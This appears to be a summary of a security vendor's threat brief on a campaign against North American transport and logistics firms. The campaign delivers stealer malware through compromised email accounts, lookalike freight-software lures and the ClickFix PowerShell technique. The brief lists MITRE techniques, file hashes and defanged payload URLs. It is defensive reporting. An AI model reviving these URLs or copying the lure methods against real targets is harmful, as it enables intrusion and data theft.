Threat Research

Security Brief: Cyber Actor Targets Transport and Logistics Firms with Malware via Compromised Accounts and Tailored Social Engineering

Proofpoint

Proofpoint researchers monitor a cluster of activity targeting transportation and logistics firms in North America, delivering multiple malware payloads via compromised email accounts and carefully crafted social engineering. The actors impersonate transport software and use techniques like Google Drive links, .URL attachments, SMB-based delivery, and the new “ClickFix” method to entice victims to run malicious code. #LummaStealer #StealC #DanaBot #Arechclient2 #Samsara #AMBLogistic #AstraTMS #ClickFix

Keypoints

  • Targets are transportation and logistics companies in North America.
  • Attacks rely on compromised legitimate email accounts to deliver malware.
  • Malware payloads include Lumma Stealer, StealC, NetSupport, DanaBot, and Arechclient2.
  • Initial access and delivery methods have evolved since May 2024.
  • Campaigns frequently use Google Drive URLs or .URL file attachments.
  • The new technique “ClickFix” delivers malware via Base64-encoded PowerShell scripts.
  • Threat actors impersonate legitimate freight/fleet software; no single actor attribution yet.

MITRE Techniques

  • [T1078] Initial Access – Use of compromised email accounts to gain access to legitimate conversations. “The actor injects malicious content into existing conversations within the account’s inbox, which makes the messages look legitimate. Proofpoint has identified at least 15 compromised email accounts used during these campaigns.”
  • [T1059.001] Execution – Execution of Base64 encoded PowerShell scripts via the “ClickFix” technique. “The messages contained URLs which directed users through various dialogue boxes leading them to copy, paste, and run a Base64 encoded PowerShell script contained within the HTML, a technique called ‘ClickFix.’”
  • [T1136] Persistence – Malware installation through remote shares using SMB. “If executed, it uses SMB to access an executable from the remote share, which installs the malware.”
  • [T1071] Command and Control – Use of URLs leading to malicious payloads hosted on compromised servers. “Use of URLs leading to malicious payloads hosted on compromised servers.”
  • [T1041] Exfiltration – Potential data theft via malware like Lumma Stealer and StealC. “Potential data theft via malware like Lumma Stealer and StealC.”

Indicators of Compromise

  • [SHA256] File hashes – 199d6f70f10c259ee09e99e6f1d7f127426999a0ed20536f2662842cd12b5431, ac49ff207e319f79bbd9c80d044d621920d1340f4c53e5e4da39b2a0c758634e, and other hashes
  • [URL] payload URLs – hxxp://89[.]23[.]98[.]98/file/ratecon.exe, hxxp://89[.]23[.]98[.]98/file/rate_confirmation.vbs, and other URLs
  • [URL] domain and hosting – live-samsaratrucking[.]com/true-tracking-32934.html, ambccm[.]com/3.msi, ambcrrm[.]com/3.msi
  • [Filename] observed payload names – Rateconfirm.exe, carrier.exe, remittance.exe, information_package.exe, 14242.exe

Read more: https://www.proofpoint.com/us/blog/threat-insight/security-brief-actor-uses-compromised-accounts-customized-social-engineering

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint